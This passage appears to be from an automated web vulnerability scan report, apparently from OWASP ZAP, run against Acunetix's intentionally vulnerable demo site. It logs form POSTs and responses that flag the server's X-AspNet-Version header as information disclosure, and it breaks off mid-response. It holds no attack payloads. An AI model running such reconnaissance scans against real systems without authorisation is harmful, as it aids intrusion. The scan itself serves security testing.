Request Body - size: 1,373 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk%2FTUy&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKDytHbBQKAgcfvBQKFzrr8AQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDelgcSNkQi9b3oGhQR0IdatoEdv&tbComment=&btnSend=Send+comment
Response Header - size: 178 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT
Response Body - size: 0 bytes.
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=2
Method	POST
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2 Content-Length: 1681 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,681 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kZLQBJ3hOt3r5jKtYjVFFKdowCSWC&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKpxZClDQKAgcfvBQKFzrr8AQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBKShEjjcO8QZ%2BTqRo3QvanE8jv9G&tbComment=&btnSend=Send+comment
Response Header - size: 178 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT
Response Body - size: 0 bytes.
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=3
Method	POST
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3 Content-Length: 1501 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,501 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WBB8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhHwAFElJlYWROZXdzLmFzcHg%2FaWQ9M2QCBw8WAh8BBagBMjYgSmFudWFyeSAyMDA1IC0gQSBiZXRhIHZlcnNpb24gb2YgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciBoYXMgYmVlbiByZWxlYXNlZCB0b2RheS4gVGhlIGJldGEgaXMgYXZhaWxhYmxlIGZvciBkb3dubG9hZCBhdCBodHRwOi8vd3d3LmFjdW5ldGl4LmNvbS9kb3dubG9hZC8uZGQzP%2FMHHnstJY%2FfWtD4cYSdoYkheQ%3D%3D&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQLj8dP9DwKAgcfvBQKFzrr8AQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBI1RRJ3EGUKdWdAQOQ9gMGQKbUn7&tbComment=&btnSend=Send+comment
Response Header - size: 178 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT
Response Body - size: 0 bytes.
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 395 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com Content-Length: 987 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 987 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8%2F4bzlRmUHIna4LG5&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpus%2FwCAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d%2Byr9JWRLj
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 12523
Response Body - size: 12,523 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/login.aspx
Method	POST
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 405 bytes.	POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/login.aspx Content-Length: 1161 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,161 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM%2FuCBtd%2Bn7UP&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 13433
Response Body - size: 13,433 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" 